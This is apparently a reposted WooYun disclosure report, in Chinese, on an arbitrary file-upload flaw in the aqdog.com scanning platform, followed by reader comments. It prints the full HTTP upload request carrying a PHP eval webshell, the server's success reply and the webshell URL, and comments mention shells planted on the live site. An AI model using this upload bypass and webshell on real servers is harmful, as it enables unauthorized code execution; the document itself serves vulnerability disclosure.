安犬漏洞扫描云平台可直接 getshell

admin 2017年5月2日06:49:55评论457 views字数 213阅读0分42秒阅读模式
摘要

2016-03-09: 细节已通知厂商并且等待厂商处理中
2016-03-09: 厂商已经确认,细节仅向厂商公开
2016-03-19: 细节向核心白帽子及相关领域专家公开
2016-03-29: 细节向普通白帽子公开
2016-04-08: 细节向实习白帽子公开
2016-04-23: 细节向公众公开

漏洞概要 关注数(50) 关注此漏洞

缺陷编号: WooYun-2016-182328

漏洞标题: 安犬漏洞扫描云平台可直接 getshell

相关厂商: aqdog.com

漏洞作者: 路人甲

提交时间: 2016-03-09 17:19

公开时间: 2016-04-23 17:31

漏洞类型: 文件上传导致任意代码执行

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 无

3人收藏


漏洞详情

披露状态:

2016-03-09: 细节已通知厂商并且等待厂商处理中
2016-03-09: 厂商已经确认,细节仅向厂商公开
2016-03-19: 细节向核心白帽子及相关领域专家公开
2016-03-29: 细节向普通白帽子公开
2016-04-08: 细节向实习白帽子公开
2016-04-23: 细节向公众公开

简要描述:

安犬漏洞扫描云平台可直接 getshell,so easy!

详细说明:

账户中心 -> 基础设置 -> 上传 LOGO 处通过 JS 限制了上传的文件类型,抓包修改后缀名为 PHP,即可直接上传 webshell。如下:

code 区域
POST /acount/users/uploadCompanyLogo HTTP/1.1
Host: www.aqdog.com
Connection: keep-alive
Content-Length: 208
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: https://www.aqdog.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTAdHqYb7YWb9OytK
Referer: https://www.aqdog.com/basicInformation/basic
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ru;q=0.2,zh-TW;q=0.2
Cookie: *

------WebKitFormBoundaryTAdHqYb7YWb9OytK
Content-Disposition: form-data; name="img"; filename="shell.php"
Content-Type: image/png

<?php eval($_POST[shell])?>
------WebKitFormBoundaryTAdHqYb7YWb9OytK--

服务器返回

code 区域
HTTP/1.1 200 OK
Server: Tengine
Date: Tue, 08 Mar 2016 10:20:43 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Methods: GET,POST,OPTIONS
Content-Length: 28

{"code":0,"msg":"shell.php"}

webshell 地址:https://www.aqdog.com/img/shell.php

漏洞证明:

webshell 地址:https://www.aqdog.com/img/shell.php

安犬漏洞扫描云平台可直接 getshell

安犬漏洞扫描云平台可直接 getshell

安犬漏洞扫描云平台可直接 getshell

修复方案:

1. 限制上传文件的类型

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2016-03-09 17:31

厂商回复:

已确认,感谢白帽子关注我公司!

最新状态:

2016-03-09:已确认,修改中,谢谢白帽子!!

2016-03-09:已确认,感谢白帽子对我公司关注!!


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(少于3人评价):

登陆后才能进行评分

0%

0%

0%

100%

0%


评价

  1. 2016-03-08 18:38 | 举起手来 ( 核心白帽子 | Rank:1957 漏洞数:204 | 准备好,举起手来!)

    1

    ...

  2. 2016-03-09 00:50 | 猪猪侠 安犬漏洞扫描云平台可直接 getshell ( 核心白帽子 | Rank:5372 漏洞数:415 | 你都有那么多超级棒棒糖了,还要自由干吗?)

    1

    呵呵,看他们那个宣传还是蛮厉害的样子

  3. 2016-03-09 10:12 | 数据流 安犬漏洞扫描云平台可直接 getshell ( 普通白帽子 | Rank:817 漏洞数:100 | 没关系啊,我们还有音乐)

    1

    好渣。

  4. 2016-03-09 15:10 | 点融网(乌云厂商)

    1

    自带特效

  5. 2016-03-09 15:47 | 路人毛 ( 普通白帽子 | Rank:157 漏洞数:64 | 要想Rank给高,标题一定得屌)

    1

    装逼失败,实力打脸

  6. 2016-03-09 17:21 | 坏男孩-A_A ( 实习白帽子 | Rank:81 漏洞数:23 | 膜拜学习中)

    1

    @点融网 自带特效,哈哈

  7. 2016-03-09 17:25 | 木易 ( 普通白帽子 | Rank:347 漏洞数:70 | 不,,不要误会,我不是针对谁,我是说在座...)

    1

    我是围观群众

  8. 2016-03-09 20:26 | 心云 ( 普通白帽子 | Rank:534 漏洞数:146 | 有追求,才会有提高!尽快达到下一个目标!)

    1

    评论里的厂商好调皮

  9. 2016-03-09 21:40 | 乌云大嫖客 ( 路人 | Rank:6 漏洞数:2 | 鄙人可是装逼界第一高手)

    1

    求大神来一发源代码

  10. 2016-03-09 22:18 | zmx ( 普通白帽子 | Rank:164 漏洞数:43 | wooyun)

    1

    安全狗 安犬 是啥关系?

  11. 2016-03-10 08:39 | xfkxfk 安犬漏洞扫描云平台可直接 getshell ( 核心白帽子 | Rank:2341 漏洞数:353 | 呵呵!)

    2

    我的shell被谁删了。。。

  12. 2016-03-10 08:50 | 奥巴马 ( 路人 | Rank:8 漏洞数:2 | hello 握日~)

    1

    楼上的shell被我删了

  13. 2016-03-10 09:08 | 安全狗(乌云厂商)

    1

    @zmx 没有半毛钱关系,是两家独立的公司。

  14. 2016-03-10 10:03 | 伤心的猫猫 ( 普通白帽子 | Rank:115 漏洞数:32 | @sangfor,@qq,@alibaba,@baidu)

    1

    楼上的楼上的shell是被楼下拿shell的弟弟的妹夫删的。

  15. 2016-03-24 14:59 | 夏天吃西瓜 ( 路人 | Rank:2 漏洞数:1 | 事了拂衣去,深藏功与名。)

    1

    啪啪啪……打得好舒服

  16. 2016-03-29 17:45 | range ( 普通白帽子 | Rank:192 漏洞数:40 | 刷洞买mac)

    1

    其实厂商是故意的

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin